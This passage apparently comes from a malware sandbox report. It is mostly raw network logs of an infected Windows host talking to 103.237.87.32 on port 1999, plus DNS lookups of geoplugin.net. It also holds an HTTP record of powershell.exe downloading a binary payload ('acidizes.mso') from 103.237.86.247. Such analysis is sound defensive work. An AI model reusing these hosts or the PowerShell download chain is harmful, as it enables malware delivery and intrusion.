                Jul 5, 2024 07:13:48.239613056 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.239625931 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.239636898 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.239640951 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.239653111 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.239664078 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.239665985 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.239698887 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.239933968 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.239984035 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.240058899 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240071058 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240082026 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240092993 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240104914 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240115881 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240124941 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.240140915 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.240159988 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.240338087 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240348101 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240500927 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240520000 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240530968 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240541935 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240541935 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.240554094 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240562916 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.240567923 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240573883 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.240581036 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240592957 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240605116 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.240617037 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.240641117 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.241101027 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241112947 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241123915 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241134882 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241147041 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241148949 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.241173983 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.241192102 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.241349936 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241492987 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241504908 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241516113 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241528988 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241544008 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241554976 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.241556883 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241569996 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241580963 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241592884 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.241594076 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.241612911 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.241630077 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.242063046 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242137909 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242146969 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242176056 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.242252111 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242264032 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242275000 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242285013 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242295980 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242297888 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.242321968 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.242342949 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.242495060 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242506027 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242513895 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242538929 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.242635965 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242647886 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242681026 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.242681980 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242700100 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242712021 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242722988 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.242754936 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.243036985 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.243047953 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.243057966 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.243069887 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.243084908 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.243107080 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.243151903 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.243282080 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.244296074 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.244349957 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.244457006 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.244460106 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.244543076 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.244554996 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.244565010 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.244601011 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.290844917 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.290935040 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.291182041 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.491245985 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491265059 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491276979 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491317034 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.491341114 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491358995 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491435051 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.491513968 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491525888 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491537094 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491548061 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491560936 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491585970 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.491606951 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.491791964 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491803885 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491816044 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491828918 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491837978 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.491842031 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491854906 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.491873980 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.491897106 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492079973 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492093086 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492126942 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492371082 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492382050 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492392063 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492415905 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492517948 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492530107 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492539883 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492552042 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492563963 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492568970 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492592096 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492611885 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492804050 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492815971 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492827892 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492841959 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492856026 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492882013 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.492950916 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492964983 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492974997 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.492985964 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493010998 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493026972 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493088961 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493100882 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493505955 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493518114 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493530989 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493541002 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493546009 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493554115 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493566036 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493571043 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493581057 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493581057 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493594885 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493607044 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493607998 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493618965 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493628025 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493639946 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493650913 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.493663073 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493699074 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.493829012 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494376898 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494389057 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494400024 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494410992 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494421959 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494430065 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494435072 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494446993 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494453907 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494460106 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494466066 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494472027 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494482040 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494493961 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494493961 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494517088 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494522095 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494535923 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494535923 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494549036 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494560957 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494571924 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494573116 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494585991 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494596958 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494599104 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494609118 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494621038 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494626999 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494632006 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494641066 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494651079 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494661093 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494672060 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494672060 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494684935 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494698048 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494702101 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494715929 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494729996 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494736910 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494741917 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494754076 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494757891 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494770050 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494779110 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494788885 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494798899 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494810104 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494820118 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494822025 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494834900 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.494841099 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494863987 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.494909048 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.495044947 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.495078087 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.495249033 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.495261908 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.495309114 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.496887922 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.496901035 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.496912003 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.496927977 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.496951103 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497031927 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497045040 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497056007 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497067928 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497083902 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497097015 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497123957 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497178078 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497189999 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497201920 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497234106 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497605085 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497616053 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497626066 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497637033 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497667074 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497756004 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497767925 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497781038 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497792959 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497802019 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497803926 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497817993 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497828960 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497829914 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.497840881 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.497865915 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.498179913 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498192072 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498205900 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498226881 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.498333931 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498347044 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498357058 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498370886 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498384953 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498398066 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.498399973 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.498431921 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.521424055 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.585200071 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585360050 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585372925 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585382938 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585393906 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585406065 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585417986 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585431099 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.585472107 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.585514069 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585676908 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585695028 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585707903 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:48.585737944 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:48.585752964 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:51.304378986 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:51.309530020 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309545040 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309595108 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:51.309617043 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:51.309637070 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309648991 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309690952 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309711933 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:51.309736967 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309830904 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309866905 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309878111 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.309921026 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.314466000 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.314596891 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.314646006 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.314730883 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.314740896 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.314753056 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.314836025 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.427540064 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:51.433191061 CEST199964546103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:51.433247089 CEST645461999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:55.070715904 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:55.072191000 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:13:55.078059912 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:13:56.250174046 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:14:25.069113970 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:14:25.070664883 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:14:25.075665951 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:14:55.085454941 CEST199964545103.237.87.32192.168.2.5
                Jul 5, 2024 07:14:55.092830896 CEST645451999192.168.2.5103.237.87.32
                Jul 5, 2024 07:14:55.099150896 CEST199964545103.237.87.32192.168.2.5

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 5, 2024 07:13:19.536557913 CEST53654981.1.1.1192.168.2.5
                Jul 5, 2024 07:13:44.502325058 CEST5727453192.168.2.51.1.1.1
                Jul 5, 2024 07:13:44.510143995 CEST53572741.1.1.1192.168.2.5
                Jul 5, 2024 07:13:45.104559898 CEST5351282162.159.36.2192.168.2.5
                Jul 5, 2024 07:13:45.611350060 CEST53638111.1.1.1192.168.2.5

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jul 5, 2024 07:13:44.502325058 CEST192.168.2.51.1.1.10xc6d8Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jul 5, 2024 07:12:57.217273951 CEST1.1.1.1192.168.2.50xf5b7No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                Jul 5, 2024 07:12:57.217273951 CEST1.1.1.1192.168.2.50xf5b7No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                Jul 5, 2024 07:13:44.510143995 CEST1.1.1.1192.168.2.50xc6d8No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • 103.237.86.247
                • geoplugin.net

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.549705103.237.86.247803528C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                Jul 5, 2024 07:13:00.158648014 CEST170OUTGET /acidizes.mso HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: 103.237.86.247
                Connection: Keep-Alive
                Jul 5, 2024 07:13:01.116761923 CEST1236INHTTP/1.1 200 OK
                Content-Type: application/octet-stream
                Last-Modified: Thu, 04 Jul 2024 09:49:17 GMT
                Accept-Ranges: bytes
                ETag: "6786e76ff7cdda1:0"
                Server: Microsoft-IIS/8.5
                Date: Fri, 05 Jul 2024 05:13:00 GMT
                Content-Length: 491856
